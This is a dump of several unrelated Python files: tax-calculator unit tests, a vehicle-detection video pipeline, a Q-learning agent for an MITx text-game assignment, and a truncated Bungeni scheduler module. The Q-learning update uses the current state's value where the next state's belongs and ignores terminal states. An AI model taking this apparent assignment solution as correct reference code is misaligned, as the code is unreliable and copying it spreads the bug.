'_II_em_cpi': False,\n '_STD_Aged': [[1600, 1300, 1300, 1600, 1600, 1300]],\n \"_STD_Aged_cpi\": False}}\n policy2.implement_reform(reform2)\n # create a Calculator object using this policy-reform\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc2 = Calculator(policy=policy2, records=puf)\n # check that Policy object embedded in Calculator object is correct\n assert calc2.current_year == 2013\n assert calc2.policy.II_em == 4000\n assert_array_equal(calc2.policy._II_em,\n np.array([4000] * Policy.DEFAULT_NUM_YEARS))\n exp_STD_Aged = [[1600, 1300, 1300,\n 1600, 1600, 1300]] * Policy.DEFAULT_NUM_YEARS\n assert_array_equal(calc2.policy._STD_Aged, np.array(exp_STD_Aged))\n assert_array_equal(calc2.policy.STD_Aged,\n np.array([1600, 1300, 1300, 1600, 1600, 1300]))\n\n\ndef test_make_Calculator_with_multiyear_reform():\n # create a Policy object and apply a policy reform\n policy3 = Policy()\n reform3 = {2015: {}}\n reform3[2015]['_STD_Aged'] = [[1600, 1300, 1600, 1300, 1600, 1300]]\n reform3[2015]['_II_em'] = [5000, 6000] # reform values for 2015 and 2016\n reform3[2015]['_II_em_cpi'] = False\n policy3.implement_reform(reform3)\n # create a Calculator object using this policy-reform\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc3 = Calculator(policy=policy3, records=puf)\n # check that Policy object embedded in Calculator object is correct\n assert calc3.current_year == 2013\n assert calc3.policy.II_em == 3900\n assert calc3.policy.num_years == Policy.DEFAULT_NUM_YEARS\n exp_II_em = [3900, 3950, 5000] + [6000] * (Policy.DEFAULT_NUM_YEARS - 3)\n assert_array_equal(calc3.policy._II_em, np.array(exp_II_em))\n calc3.increment_year()\n calc3.increment_year()\n assert calc3.current_year == 2015\n assert_array_equal(calc3.policy.STD_Aged,\n np.array([1600, 1300, 1600, 1300, 1600, 1300]))\n\n\ndef test_make_Calculator_with_reform_after_start_year():\n # create Policy object using custom indexing rates\n irates = {2013: 0.01, 2014: 0.01, 2015: 0.02, 2016: 0.01, 2017: 0.03}\n parm = Policy(start_year=2013, num_years=len(irates),\n inflation_rates=irates)\n # specify reform in 2015, which is two years after Policy start_year\n reform = {2015: {}, 2016: {}}\n reform[2015]['_STD_Aged'] = [[1600, 1300, 1600, 1300, 1600, 1300]]\n reform[2015]['_II_em'] = [5000]\n reform[2016]['_II_em'] = [6000]\n reform[2016]['_II_em_cpi'] = False\n parm.implement_reform(reform)\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=parm, records=recs)\n # compare actual and expected parameter values over all years\n exp_STD_Aged = np.array([[1500, 1200, 1200, 1500, 1500, 1200],\n [1550, 1200, 1200, 1550, 1550, 1200],\n [1600, 1300, 1600, 1300, 1600, 1300],\n [1632, 1326, 1632, 1326, 1632, 1326],\n [1648, 1339, 1648, 1339, 1648, 1339]])\n exp_II_em = np.array([3900, 3950, 5000, 6000, 6000])\n assert_array_equal(calc.policy._STD_Aged, exp_STD_Aged)\n assert_array_equal(calc.policy._II_em, exp_II_em)\n # compare actual and expected values for 2015\n calc.increment_year()\n calc.increment_year()\n assert calc.current_year == 2015\n exp_2015_II_em = 5000\n assert_array_equal(calc.policy.II_em, exp_2015_II_em)\n exp_2015_STD_Aged = np.array([1600, 1300, 1600, 1300, 1600, 1300])\n assert_array_equal(calc.policy.STD_Aged, exp_2015_STD_Aged)\n\n\ndef test_make_Calculator_user_mods_with_cpi_flags(policyfile):\n with open(policyfile.name) as pfile:\n policy = json.load(pfile)\n ppo = Policy(parameter_dict=policy, start_year=1991,\n num_years=len(IRATES), inflation_rates=IRATES,\n wage_growth_rates=WRATES)\n rec = Records(data=TAX_DTA, start_year=1991)\n calc = Calculator(policy=ppo, records=rec)\n user_mods = {1991: {\"_almdep\": [7150, 7250, 7400],\n \"_almdep_cpi\": True,\n \"_almsep\": [40400, 41050],\n \"_almsep_cpi\": False,\n \"_rt5\": [0.33],\n \"_rt7\": [0.396]}}\n calc.policy.implement_reform(user_mods)\n # compare actual and expected values\n inf_rates = [IRATES[1991 + i] for i in range(0, Policy.DEFAULT_NUM_YEARS)]\n exp_almdep = Policy.expand_array(np.array([7150, 7250, 7400]),\n inflate=True,\n inflation_rates=inf_rates,\n num_years=Policy.DEFAULT_NUM_YEARS)\n act_almdep = getattr(calc.policy, '_almdep')\n assert_array_equal(act_almdep, exp_almdep)\n exp_almsep_values = [40400] + [41050] * (Policy.DEFAULT_NUM_YEARS - 1)\n exp_almsep = np.array(exp_almsep_values)\n act_almsep = getattr(calc.policy, '_almsep')\n assert_array_equal(act_almsep, exp_almsep)\n\n\ndef test_make_Calculator_raises_on_no_policy():\n rec = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2013)\n with pytest.raises(ValueError):\n calc = Calculator(records=rec)\n\n\ndef test_Calculator_attr_access_to_policy():\n policy = Policy()\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=policy, records=puf)\n assert hasattr(calc.records, 'c01000')\n assert hasattr(calc.policy, '_AMT_Child_em')\n assert hasattr(calc, 'policy')\n\n\ndef test_Calculator_create_distribution_table():\n policy = Policy()\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=policy, records=puf)\n calc.calc_all()\n dist_labels = ['Returns', 'AGI', 'Standard Deduction Filers',\n 'Standard Deduction', 'Itemizers',\n 'Itemized Deduction', 'Personal Exemption',\n 'Taxable Income', 'Regular Tax', 'AMTI', 'AMT Filers',\n 'AMT', 'Tax before Credits', 'Non-refundable Credits',\n 'Tax before Refundable Credits', 'Refundable Credits',\n 'Individual Income Tax Liabilities',\n 'Payroll Tax Liablities',\n 'Combined Payroll and Individual Income Tax Liabilities']\n dt1 = create_distribution_table(calc, groupby=\"weighted_deciles\",\n result_type=\"weighted_sum\")\n dt1.columns = dist_labels\n dt2 = create_distribution_table(calc, groupby=\"small_income_bins\",\n result_type=\"weighted_avg\")\n assert isinstance(dt1, pd.DataFrame)\n assert isinstance(dt2, pd.DataFrame)\n\n\ndef test_Calculator_mtr():\n policy = Policy()\n puf = Records(TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=policy, records=puf)\n (mtr_FICA, mtr_IIT, mtr) = calc.mtr()\n assert type(mtr) == np.ndarray\n assert np.array_equal(mtr, mtr_FICA) is False\n assert np.array_equal(mtr_FICA, mtr_IIT) is False\n\n\ndef test_Calculator_create_difference_table():\n # create current-law Policy object and use to create Calculator calc1\n policy1 = Policy()\n puf1 = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc1 = Calculator(policy=policy1, records=puf1)\n calc1.calc_all()\n # create policy-reform Policy object and use to create Calculator calc2\n policy2 = Policy()\n reform = {2013: {'_II_rt7': [0.45]}}\n policy2.implement_reform(reform)\n puf2 = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc2 = Calculator(policy=policy2, records=puf2)\n # create difference table and check that it is a Pandas DataFrame\n dtable = create_difference_table(calc1, calc2, groupby=\"weighted_deciles\")\n assert isinstance(dtable, pd.DataFrame)\n\n\ndef test_Calculator_diagnostic_table():\n policy = Policy()\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=Records.PUF_YEAR)\n calc = Calculator(policy=policy, records=puf)\n calc.diagnostic_table()\n\n\ndef test_Calculator_diagnostic_table_no_mutation():\n policy_x = Policy()\n record_x = Records(data=TAX_DTA, weights=WEIGHTS,\n start_year=Records.PUF_YEAR)\n policy_y = Policy()\n record_y = Records(data=TAX_DTA, weights=WEIGHTS,\n start_year=Records.PUF_YEAR)\n calc_x = Calculator(policy=policy_x, records=record_x)\n calc_y = Calculator(policy=policy_y, records=record_y)\n x_start = calc_x.current_year\n y_start = calc_y.current_year\n calc_y.diagnostic_table(base_calc=calc_x)\n assert calc_y.current_year == y_start\n assert calc_x.current_year == x_start\n\n\ndef test_make_Calculator_increment_years_first():\n # create Policy object with custom indexing rates and policy reform\n irates = {2013: 0.01, 2014: 0.01, 2015: 0.02, 2016: 0.01, 2017: 0.03}\n policy = Policy(start_year=2013, inflation_rates=irates,\n num_years=len(irates))\n reform = {2015: {}, 2016: {}}\n reform[2015]['_STD_Aged'] = [[1600, 1300, 1600, 1300, 1600, 1300]]\n reform[2015]['_II_em'] = [5000]\n reform[2016]['_II_em'] = [6000]\n reform[2016]['_II_em_cpi'] = False\n policy.implement_reform(reform)\n # create Records object by reading 1991 data and saying it is 2009 data\n puf = Records(TAX_DTA, weights=WEIGHTS, start_year=2009)\n # create Calculator object with Policy object as modified by reform\n calc = Calculator(policy=policy, records=puf)\n # compare expected policy parameter values with those embedded in calc\n exp_STD_Aged = np.array([[1500, 1200, 1200, 1500, 1500, 1200],\n [1550, 1200, 1200, 1550, 1550, 1200],\n [1600, 1300, 1600, 1300, 1600, 1300],\n [1632, 1326, 1632, 1326, 1632, 1326],\n [1648, 1339, 1648, 1339, 1648, 1339]])\n exp_II_em = np.array([3900, 3950, 5000, 6000, 6000])\n assert_array_equal(calc.policy._STD_Aged, exp_STD_Aged)\n assert_array_equal(calc.policy._II_em, exp_II_em)\n\n\ndef test_Calculator_using_nonstd_input(rawinputfile):\n # check Calculator handling of raw, non-standard input data with no aging\n policy = Policy()\n policy.set_year(RAWINPUTFILE_YEAR) # set policy params to input data year\n nonpuf = Records(data=rawinputfile.name,\n start_year=RAWINPUTFILE_YEAR, # set raw input data year\n consider_imputations=False) # keeps raw data unchanged\n assert nonpuf.dim == RAWINPUTFILE_FUNITS\n calc = Calculator(policy=policy,\n records=nonpuf,\n sync_years=False) # keeps raw data unchanged\n assert calc.current_year == RAWINPUTFILE_YEAR\n calc.calc_all()\n exp_iitax = np.zeros((nonpuf.dim,))\n assert_array_equal(nonpuf._iitax, exp_iitax)\n mtr_fica, _, _ = calc.mtr(wrt_full_compensation=False)\n exp_mtr_fica = np.zeros((nonpuf.dim,))\n exp_mtr_fica.fill(0.153)\n assert_array_equal(mtr_fica, exp_mtr_fica)\n\n\nclass TaxCalcError(Exception):\n '''I've stripped this down to a simple extension of the basic Exception for\n now. We can add functionality later as we see fit.\n '''\n pass\n","sub_path":"taxcalc/tests/test_calculate.py","file_name":"test_calculate.py","file_ext":"py","file_size_in_byte":19008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"340412152","text":"import matplotlib.image as mpimg\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom skimage.feature import hog\nfrom lesson_functions import *\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom skvideo.io import FFmpegWriter\nfrom scipy.ndimage.measurements import label\nfrom Tracker import Tracker\n\n\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (32, 32) # Spatial binning dimensions\nhist_bins = 32 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [400, 656] # Min and max in y to search in slide_window()\n\nimport pickle\ndist_pickle = pickle.load( open(\"svc_pickle.p\", \"rb\" ) )\nsvc = dist_pickle[\"svc\"]\nX_scaler = dist_pickle[\"scaler\"]\nimage = mpimg.imread(\"testgit.jpg\")\nimage = image.astype(np.float32)/255\ndraw_image = np.copy(image)\n\nvideo = \"project_video.mp4\"\nvideoOut = \"boxes.mp4\"\n\nvidcap = cv2.VideoCapture(video)\nfcount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nsuccess, img = vidcap.read()\nshape = img.shape\nvidout = FFmpegWriter(videoOut)\nif not success: sys.exit(1)\ni = 0\nfps_avg = []\n\n\ntracker = Tracker()\n\nwhile True:\n i+=1\n img_converted = convert_cv_mpl(img)\n draw_image = np.copy(img)\n t1 = time.time()\n windows = slide_window(img_converted, x_start_stop=[None, None], y_start_stop=y_start_stop, \n xy_windows=[(64,64),(96,96)], xy_overlap=(0.5, 0.5))\n\n hot_windows = search_windows(img_converted, windows, svc, X_scaler, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat) \n #img_plot = draw_boxes(draw_image, hot_windows, color=(0, 0, 255), thick=6) \n heat = np.zeros_like(draw_image[:,:,0]).astype(np.float)\n heat = add_heat(heat, hot_windows)\n heat = apply_threshold(heat, 0.5)\n heatmap = np.clip(heat, 0, 255)\n labels = label(heatmap)\n #img_plot = draw_labeled_bboxes(np.copy(draw_image), labels, draw=True)\n boxes = draw_labeled_bboxes(np.copy(draw_image), labels, draw=False)\n for box in boxes:\n xmin = box[0][0]\n xmax = box[1][0]\n ymin = box[0][1]\n ymax = box[1][1]\n centerx = (xmin + xmax)/2\n centery = (ymin + ymax)/2\n frameimg = draw_image[ymin:ymax, xmin:xmax]\n tracker.new_object([centerx, centery], frameimg)\n img_plot = np.copy(draw_image)\n tracker.draw_frames(img_plot)\n \n t2 = time.time()\n fps = 1/(t2-t1)\n fps_avg.append(fps)\n if len(fps_avg) > 200: fps_avg.pop(0)\n fps_print = int(np.mean(fps_avg))\n #cv2.putText(img_plot, \"FPS: {}\".format(fps_print), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0,0,255), 3)\n vidout.writeFrame((convert_cv_mpl(img_plot)*255).astype(np.uint8))\n cv2.imshow('img', img_plot)\n #printProgressBar(i, fcount, \"Progress:\", \"({} FPS)\".format(fps_print), length=20)\n if cv2.waitKey(1) & 0xFF == ord('q'): break\n success, img = vidcap.read()\n if not success: break\n\nvidcap.release()\nvidout.close()\ncv2.destroyAllWindows()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329053275","text":"\"\"\"Tabular QL agent\r\n Simple Policy-learning algorithm\r\n In this project, we address the task of learning control policies for text-based games using reinforcement learning.\r\n In these games, all interactions between players and the virtual world are through text.\r\n The current world state is described by elaborate text, and the underlying state is not directly observable.\r\n Players read descriptions of the state and respond with natural language commands to take actions.\r\n\r\n For this project you will conduct experiments on a small Home World, which mimic the environment of a typical house.The world consists of a few rooms, and each room contains a representative object that the player can interact with.\r\n For instance, the kitchen has an apple that the player can eat. The goal of the player is to finish some quest. An example of a quest given to the player in text is You are hungry now .\r\n To complete this quest, the player has to navigate through the house to reach the kitchen and eat the apple.\r\n In this game, the room is hidden from the player, who only receives a description of the underlying room.\r\n At each step, the player read the text describing the current room and the quest, and respond with some command (e.g., eat apple ).\r\n The player then receives some reward that depends on the state and his/her command.\r\n\r\n In order to design an autonomous game player, we will employ a reinforcement learning framework to learn command policies using game rewards as feedback.\r\n Since the state observable to the player is described in text, we have to choose a mechanism that maps text descriptions into vector representations.\r\n\r\n A naive approach is to create a map that assigns a unique index for each text description. -- agent_tabular_ql.py\r\n\r\n However, such approach becomes difficult to implement when the number of textual state descriptions are huge.\r\n An alternative method is to use a bag-of-words representation derived from the text description. -- agent_linear.py\r\n\r\n Deep-learning approach -- agent_dqn.py\r\n\r\n\"\"\"\r\n# https://learning.edx.org/course/course-v1:MITx+6.86x+1T2021/block-v1:MITx+6.86x+1T2021+type@sequential+block@P5_rl/block-v1:MITx+6.86x+1T2021+type@vertical+block@P5_rl-tab3\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport framework\r\nimport utils\r\n\r\nDEBUG = True\r\n\r\nGAMMA = 0.5 # discounted factor\r\nTRAINING_EP = 0.5 # epsilon-greedy parameter for training\r\nTESTING_EP = 0.05 # epsilon-greedy parameter for testing\r\nNUM_RUNS = 10\r\nNUM_EPOCHS = 200\r\nNUM_EPIS_TRAIN = 25 # number of episodes for training at each epoch\r\nNUM_EPIS_TEST = 50 # number of episodes for testing\r\nALPHA = 0.1 # learning rate for training\r\n\r\nACTIONS = framework.get_actions()\r\nOBJECTS = framework.get_objects()\r\nNUM_ACTIONS = len(ACTIONS)\r\nNUM_OBJECTS = len(OBJECTS)\r\n\r\n\r\n# pragma: coderesponse template\r\ndef epsilon_greedy(state_1, state_2, q_func, epsilon):\r\n \"\"\"Returns an action selected by an epsilon-Greedy exploration policy\r\n\r\n Note that the Q-learning algorithm does not specify how we should interact in the world so as to learn quickly.\r\n It merely updates the values based on the experience collected. If we explore randomly, i.e., always select actions at random, we would most likely not get anywhere.\r\n A better option is to exploit what we have already learned, as summarized by current Q-values.\r\n a typical exploration strategy is to follow a so-called epsilon-greedy policy: with probability epsilon take a random action out of 𝐶, and with probability 1−epsilon follow the best policy.\r\n The value of 𝜀 here balances exploration vs exploitation. A large value of 𝜀 means exploring more (randomly), not using much of what we have learned.\r\n A small 𝜀, on the other hand, will generate experience consistent with the current estimates of Q-values.\r\n\r\n Args:\r\n state_1, state_2 (int, int): two indices describing the current state\r\n q_func (np.ndarray): current Q-function\r\n epsilon (float): the probability of choosing a random command\r\n with probabily (1 - epsilon) following that command.\r\n Returns:\r\n (int, int): the indices describing the action/object to take\r\n \"\"\"\r\n current_room_index = state_1\r\n best_action_value = 0\r\n (action_index, object_index) = (None, None)\r\n choice = np.random.choice([0,1], p=[epsilon, 1-epsilon])\r\n\r\n valid_actions = framework.command_is_valid[current_room_index,...]\r\n valid_actions = np.argwhere(valid_actions == 1)\r\n random_actions = []\r\n for (i,j) in valid_actions:\r\n random_actions.append((i,j))\r\n qValue = q_func[state_1, state_2, i, j]\r\n if qValue > best_action_value :\r\n best_action = (i, j)\r\n best_action_value = qValue\r\n\r\n if best_action_value > 0 and choice == 1 : # choose the best one\r\n (action_index, object_index) = best_action\r\n else: # random choose from valid actions\r\n choice = np.random.choice(len(random_actions))\r\n (action_index, object_index) = random_actions[choice]\r\n\r\n #\r\n # valid_actions = []\r\n # best_action = (None, None)\r\n # for i in range(NUM_ACTIONS):\r\n # for j in range(NUM_OBJECTS):\r\n # if (framework.command_is_valid[current_room_index, i, j] == 1):\r\n # valid_actions.append((i,j))\r\n # qValue = q_func[state_1, state_2, i, j]\r\n # if qValue > best_action_value :\r\n # best_action = (i, j)\r\n # best_action_value = qValue\r\n # if best_action_value > 0 and choice == 1 : # choose the best one\r\n # (action_index, object_index) = best_action\r\n # else: # random choose from valid actions\r\n # choice = np.random.choice(len(valid_actions))\r\n # (action_index, object_index) = valid_actions[choice]\r\n\r\n return (action_index, object_index)\r\n\r\n\r\ndef state_value(q_func, state_1, state_2):\r\n \"\"\"\r\n V(s) = max Q(s,c) for all c, where c represents an action of a on object b: (a, b)\r\n \"\"\"\r\n q_v = q_func[state_1, state_2, ...]\r\n return np.amax(q_v)\r\n\r\n\r\ndef tabular_q_learning(q_func, current_state_1, current_state_2, action_index,\r\n object_index, reward, next_state_1, next_state_2,\r\n terminal):\r\n \"\"\"Update q_func for a given transition\r\n\r\n Qnew(s,c) = (1-alpha) * Qold(s,c) + alpha * (Reward(s,c,s') + gamma * V(s'))\r\n V(s) = max Q(s,c) for all c, where c represents an action of a on object b: (a, b)\r\n\r\n Args:\r\n q_func (np.ndarray): current Q-function\r\n current_state_1, current_state_2 (int, int): two indices describing the current state\r\n action_index (int): index of the current action\r\n object_index (int): index of the current object\r\n reward (float): the immediate reward the agent recieves from playing current command\r\n next_state_1, next_state_2 (int, int): two indices describing the next state\r\n terminal (bool): True if this episode is over\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n stateValue = state_value(q_func, current_state_1, current_state_2)\r\n\r\n currentQ = q_func[current_state_1, current_state_2, action_index,\r\n object_index]\r\n\r\n q_func[current_state_1, current_state_2, action_index,\r\n object_index] = (1 - ALPHA) * currentQ + ALPHA * (reward + GAMMA * stateValue)\r\n\r\n return None # This function shouldn't return anything\r\n\r\n\r\n# In this section, you will evaluate your learning algorithm for the Home World game.\r\n# The metric we use to measure an agent's performance is the cumulative discounted reward obtained per episode averaged over the episodes.\r\n# The evaluation procedure is as follows. Each experiment (or run) consists of multiple epochs (the number of epochs is NUM_EPOCHS).\r\n# In each epoch:\r\n# 1. You first train the agent on NUM_EPIS_TRAIN episodes, following an 𝜀-greedy policy with 𝜀=TRAINING_EP and updating the 𝑄 values.\r\n# 2. Then, you have a testing phase of running NUM_EPIS_TEST episodes of the game, following an 𝜀-greedy policy with 𝜀=TESTING_EP,\r\n# which makes the agent choose the best action according to its current Q-values 95% of the time.\r\n# At the testing phase of each epoch, you will compute the cumulative discounted reward for each episode and then obtain the average reward over the NUM_EPIS_TEST episodes.\r\n# Finally, at the end of the experiment, you will get a sequence of data (of size NUM_EPOCHS) that represents the testing performance at each epoch.\r\n#\r\n# Note that there is randomness in both the training and testing phase. You will run the experiment NUM_RUNS times and then compute the averaged reward performance over NUM_RUNS experiments.\r\n#\r\n\r\ndef run_episode(for_training):\r\n \"\"\" Runs one episode\r\n If for training, update Q function\r\n If for testing, computes and return cumulative discounted reward\r\n\r\n Args:\r\n for_training (bool): True if for training\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n epsilon = TRAINING_EP if for_training else TESTING_EP\r\n\r\n epi_reward = None\r\n # initialize for each episode\r\n # TODO Your code here\r\n\r\n (current_room_desc, current_quest_desc, terminal) = framework.newGame()\r\n while not terminal:\r\n # Choose next action and execute\r\n\r\n current_room_index = framework.rooms_desc_map[current_room_desc]\r\n quest_index = framework.quests_map[current_quest_desc]\r\n\r\n (action, object) = epsilon_greedy(current_room_index, quest_index, q_func, epsilon)\r\n (next_room_desc, next_quest_desc, reward, terminal) = framework.step_game(current_room_desc, current_quest_desc, action, object)\r\n\r\n if for_training:\r\n # update Q-function.\r\n next_room_index = framework.rooms_desc_map[next_room_desc]\r\n next_quest_index = framework.quests_map[next_quest_desc]\r\n tabular_q_learning(q_func, current_room_index, quest_index, action, object, reward, next_room_index, next_quest_index, terminal)\r\n\r\n\r\n if not for_training:\r\n # update reward\r\n if epi_reward == None:\r\n epi_reward = reward\r\n else:\r\n epi_reward += reward\r\n\r\n # prepare next step\r\n current_room_desc = next_room_desc\r\n current_quest_desc = next_quest_desc\r\n\r\n if not for_training:\r\n return epi_reward\r\n\r\n\r\n# pragma: coderesponse end\r\n\r\n\r\ndef run_epoch():\r\n \"\"\"Runs one epoch and returns reward averaged over test episodes\"\"\"\r\n rewards = []\r\n\r\n for _ in range(NUM_EPIS_TRAIN):\r\n run_episode(for_training=True)\r\n\r\n for _ in range(NUM_EPIS_TEST):\r\n rewards.append(run_episode(for_training=False))\r\n\r\n return np.mean(np.array(rewards))\r\n\r\n\r\ndef run():\r\n \"\"\"Returns array of test reward per epoch for one run\"\"\"\r\n global q_func\r\n q_func = np.zeros((NUM_ROOM_DESC, NUM_QUESTS, NUM_ACTIONS, NUM_OBJECTS))\r\n\r\n single_run_epoch_rewards_test = []\r\n pbar = tqdm(range(NUM_EPOCHS), ncols=80)\r\n for _ in pbar:\r\n single_run_epoch_rewards_test.append(run_epoch())\r\n pbar.set_description(\r\n \"Avg reward: {:0.6f} | Ewma reward: {:0.6f}\".format(\r\n np.mean(single_run_epoch_rewards_test),\r\n utils.ewma(single_run_epoch_rewards_test)))\r\n return single_run_epoch_rewards_test\r\n\r\n\r\nif __name__ == '__main__':\r\n # Data loading and build the dictionaries that use unique index for each state\r\n (dict_room_desc, dict_quest_desc) = framework.make_all_states_index()\r\n NUM_ROOM_DESC = len(dict_room_desc)\r\n NUM_QUESTS = len(dict_quest_desc)\r\n\r\n # set up the game\r\n framework.load_game_data()\r\n\r\n epoch_rewards_test = [] # shape NUM_RUNS * NUM_EPOCHS\r\n\r\n for _ in range(NUM_RUNS):\r\n epoch_rewards_test.append(run())\r\n\r\n epoch_rewards_test = np.array(epoch_rewards_test)\r\n\r\n x = np.arange(NUM_EPOCHS)\r\n fig, axis = plt.subplots()\r\n axis.plot(x, np.mean(epoch_rewards_test,\r\n axis=0)) # plot reward per epoch averaged per run\r\n axis.set_xlabel('Epochs')\r\n axis.set_ylabel('reward')\r\n axis.set_title(('Tablular: nRuns=%d, Epilon=%.2f, Epi=%d, alpha=%.4f' %\r\n (NUM_RUNS, TRAINING_EP, NUM_EPIS_TRAIN, ALPHA)))\r\n plt.show()\r\n","sub_path":"reinforcement_learning/agent_tabular_ql.py","file_name":"agent_tabular_ql.py","file_ext":"py","file_size_in_byte":12402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2690476","text":"# Bungeni Parliamentary Information System - http://www.bungeni.org/\n# Copyright (C) 2010 - Africa i-Parliaments - http://www.parliaments.info/\n# Licensed under GNU GPL v2 - http://www.gnu.org/licenses/gpl-2.0.txt\n\n\"\"\"Python code for JavaScript resources.\n\n$Id$\n\"\"\"\nimport json\nimport zope.interface\nfrom zope.app.component.hooks import getSite\nimport zope.publisher.interfaces.browser\nfrom bungeni.ui.utils import url\nfrom bungeni.utils import common, misc\nfrom bungeni.core.language import get_default_language\nfrom bungeni.ui.calendar import data\nfrom bungeni.capi import capi\nfrom bungeni import _, translate\n\n\nclass CachedProperties(object):\n \n @misc.cached_property\n def items_container(self):\n \"\"\"The URL to a container listing documents available for scheduling\n \"\"\"\n site = getSite()\n container = site[\"workspace\"][\"scheduling\"][\"documents\"]\n request = common.get_request()\n app_url = request.getApplicationURL()\n return url.absoluteURL(container, request).replace(app_url, \"\")\n\ncached_props = CachedProperties()\n\nRESOURCE_MAPPING = {\n \"scheduler-globals.js\": \"scheduler_globals\",\n \"calendar-globals.js\": \"calendar_globals\",\n}\n\nRESOURCE_HEADERS = {}\n\n## some global strings to i18n ##\nYES = _(\"scheduling_message_yes\", default=u\"Yes\")\nNO = _(\"scheduling_message_no\", default=u\"No\")\nOKAY = _(\"scheduling_message_okay\", default=u\"Okay\")\nDONE = _(\"scheduling_message_done\", default=u\"Done\")\nNOTICE = _(\"scheduling_message_notice\", default=u\"Notice\")\nWORKING = _(\"scheduling_message_working\", default=u\"Working\")\nCANCEL = _(\"scheduling_message_cancel\", default=u\"Cancel\")\nVIEW = _(\"scheduling_message_view\", default=u\"View\")\nEDIT = _(\"scheduling_message_edit\", default=u\"Edit\")\nDELETE = _(\"scheduling_message_delete\", default=u\"Delete\")\nWARNING = _(\"scheduling_message_warning\", default=u\"Warning\")\nMINUTES = _(\"scheduling_text_minutes\", default=u\"Minutes\")\nSTART_DATE = _(\"scheduling_filters_start_date\", default=u\"Start Date\")\nEND_DATE = _(\"scheduling_filters_end_date\", default=u\"End Date\")\n\n# columns\nCOLUMN_TYPE = _(\"scheduling_column_type\", default=\"Type\")\nCOLUMN_MOVER = _(\"scheduling_column_mover\", default=\"Moved by\")\nCOLUMN_STATUS = _(\"scheduling_column_status\", default=\"Status\")\nCOLUMN_STATUS_DATE = _(\"scheduling_column_status_date\", default=\"Date\")\nCOLUMN_REGISTRY_NUMBER = _(\"scheduling_column_registry_no\", default=\"No.\")\nCOLUMN_DESCRIPTION = _(\"scheduling_column_description\", \n default=\"Description\")\nCOLUMN_MINUTE_TEXT = _(\"scheduling_column_minute_text\", \n default=\"Minute Text\")\n\n# titles\nTITLE_AGENDA = _(\"scheduling_title_agenda\", default=\"Agenda\")\nTITLE_AGENDA_MINUTES = _(\"scheduling_title_agenda_minutes\", \n default=\"Agenda Minutes and Votes\")\nTITLE_SCHEDULED_ITEMS = _(\"scheduling_title_scheduled_items\", \n default=\"Scheduled Items\")\nTITLE_AVAILABLE_ITEMS = _(\"scheduling_title_available_items\", \n default=\"Available Items\")\nTITLE_DISCUSSIONS = _(\"scheduling_title_discussions\", \n default=\"Agenda and Minutes\")\n\n# types\nTYPE_HEADING = _(\"scheduling_type_heading\", default=\"Heading\")\nTYPE_MINUTE = _(\"scheduling_type_minute\", default=\"Minute Record\")\nTYPE_EDITORIAL_NOTE = _(\"scheduling_type_editorial_note\", \n default=\"Editorial Note\")\n\n# actions\nREMOVE_ITEM = _(\"scheduling_action_remove_item\", default=\"Remove Item\")\nADD_MINUTE = _(\"scheduling_action_add_minute\", default=\"Add Minute\")\nSAVE_AND_PREVIEW = _(\"scheduling_action_save_preview\", \n default=\"Save and preview\")\nSAVE_CHANGES = _(\"scheduling_action_save_changes\", \n default=\"Save Changes\")\nDISCARD_CHANGES = _(\"scheduling_action_discard_changes\", \n default=\"Discard Changes\")\n\n\ndef get_globals(group_name, target_language=None):\n kwargs = {\"target_language\": target_language or capi.default_language}\n type_names = {\n \"heading\": translate(_(u\"heading\"), **kwargs),\n \"editorial_note\": translate(TYPE_EDITORIAL_NOTE, **kwargs),\n \"minute\": translate(_(u\"minute record\"), **kwargs),\n }\n type_names.update([\n (name, translate(info.get(\"display_name\"), **kwargs))\n for (name, info) in data.get_schedulable_types(True).iteritems()\n ])\n globals_map = {\n \"SCHEDULER_GLOBALS\" : {\n \"items_container_uri\": cached_props.items_container,\n \"schedulable_types\": [ \n dict(name=name, title=translate(info.get(\"title\"), **kwargs)) \n for (name, info) in \n sorted(data.get_schedulable_types().iteritems())\n ],\n \"discussable_types\": [k for k in data.get_schedulable_types(True)],\n \"editable_types\": [\"editorial_note\", \"heading\", \"minute\"],\n \"types\": 